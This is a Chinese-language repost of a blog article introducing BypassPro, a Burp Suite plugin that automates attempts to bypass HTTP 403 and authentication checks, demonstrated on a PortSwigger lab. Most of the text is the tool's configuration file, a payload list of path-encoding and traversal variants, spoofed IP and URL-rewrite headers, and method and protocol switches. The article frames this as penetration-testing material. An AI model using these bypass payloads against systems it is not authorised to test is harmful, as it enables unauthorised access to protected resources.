BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

admin 2024年10月14日17:18:33评论19 views字数 2070阅读6分54秒阅读模式

burpsuite插件,自动化bypass 403,可自定义bypass路径

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途给予盈利等目的,否则后果自行承担!

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

项目地址:https://github.com/c0r1/BypassPro

插件采用 Montoya API 进行开发,使用插件需要升级你的 BurpSuite 版本

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

使用

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

以 PortSwigger Lab 为例:https://portswigger.net/web-security/access-control/lab-url-based-access-control-can-be-circumvented

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

选择目标请求,右键点击 "Send to BypassPro”

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

支持多目标请求扫描:

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

选择 BypassPro 标签页,查看结果

支持响应内容相似度匹配(from @pmiaowu HostCollision); 如果返回结果相似度很高,则不展示

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

fuzz规则

BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

自定义规则

修改 BypassPro.jar 所在目录下 resources/config.yml 内容,可添加自定义扫描规则

payload:
# 允许访问的路径
ALLOWED_ACCESS_PATHS:
- '/api/'
- '/static/'
# 前缀绕过
PREFIX_PAYLOAD:
- '//'
- '/.'
- '/;'
- '/.;'
- '/..%00'
- '/..%0d'
- '/..%5c'
- '/api;/..'
# 后缀绕过
SUFFIX_PAYLOAD:
- ';.ico'
- ';.css'
- ';.html'
- ';.js'
- ';.json'
- ';.css.jsp'
- ';.js.jsp'
- ';/'
- ';%09'
- ';%09..;'
- ';%2f..'
- '??'
- '???'
- '?debug=true'
- '.'
- '..;'
- '..;/'
- '.././'
- '..%00/'
- '..%0d/'
- '..%2f'
- '..%ff/'
- '%2e/'
- '%20/'
- '.css'
- '.html'
- '.js'
- '.json'
- '/'
- '/.'
- '/..'
- '/..;/'
- '/./'
- '/*'
- '#'
- '%00'
- '%09'
- '%0a'
- '%0d'
- '%20'
- '%23'
- '%26'
- '%2e'
- '%2f'
- '%3f'
- '%5c'
- '~'
AFTER_HIERARCHY_PATH:
- ';'
- '%3b'
- '.'
- '/'
- '.;'
- '..;'
- '...;'
BETWEEN_HIERARCHY_PATH:
- ';'
- '.'
- '.;'
- '..;'
- '...;'
# 请勿随意更改
DIRECTORY_TRAVERSAL_SYMBOLS:
- '..'
- '...'
- '..;'
- '...;'
DEFAULT_ADD_HEADERS_NUM: 10
FAKE_IP_HEADERS:
- X-ProxyUser-Ip
- Client-IP
- X-Originating-IP
- X-Forwarded-For
- X-Remote-IP
- X-Remote-Addr
- X-Real-IP
- X-Custom-IP-Authorization
- X-Host
- X-Client-IP
- X-Forwared-Host
- X-Http-Destinationurl
- Proxy-Host
- Request-Uri
- X-Forwarded-By
- X-Forwarded
- X-Forwarded-For-Original
- X-Forwarded-Server
- X-Forwarder-For
- X-Forward-For
- X-Forwarded-Proto
- Base-Url
- Http-Url
- Proxy-Url
- Real-Ip
- Referer
- Referrer
- Refferer
- X-Original-Remote-Addr
- X-Original-Url
- X-Proxy-Url
- X-Rewrite-Url
- Forwarded
- Forwarded-For
- Forwarded-For-Ip
- True-Client-IP
- X-Forwarded-Host
- X-HTTP-Host-Override
- X-Requested-By
- X-Requested-For
- X-Trusted-IP
- Akamai-Client-Ip
FAKE_PATH_HEADERS:
- X-Rewrite-URL
- X-Original-URL
- X-Forwarded-Path
- X-Proxy-Url
- Http-Url
- Proxy-Url
- Base-Url
- Url
- Uri
# 暂不支持数组形式
FAKE_IP: 127.0.0.1
METHODS:
- TOGGLE_METHOD
- HEAD
- PUT
- PATCH
- TRACE
PROTOCOLS:
- HTTP/1.0
- HTTP/0.9
COOKIELESS:
- /(S(X))
- /(S(X))/(S(X))

原文始发于微信公众号(进击的HACK):BypassPro 自动化 bypass 403/auth ,可自定义bypass路径

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年10月14日17:18:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   BypassPro 自动化 bypass 403/auth ,可自定义bypass路径https://cn-sec.com/archives/3264413.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息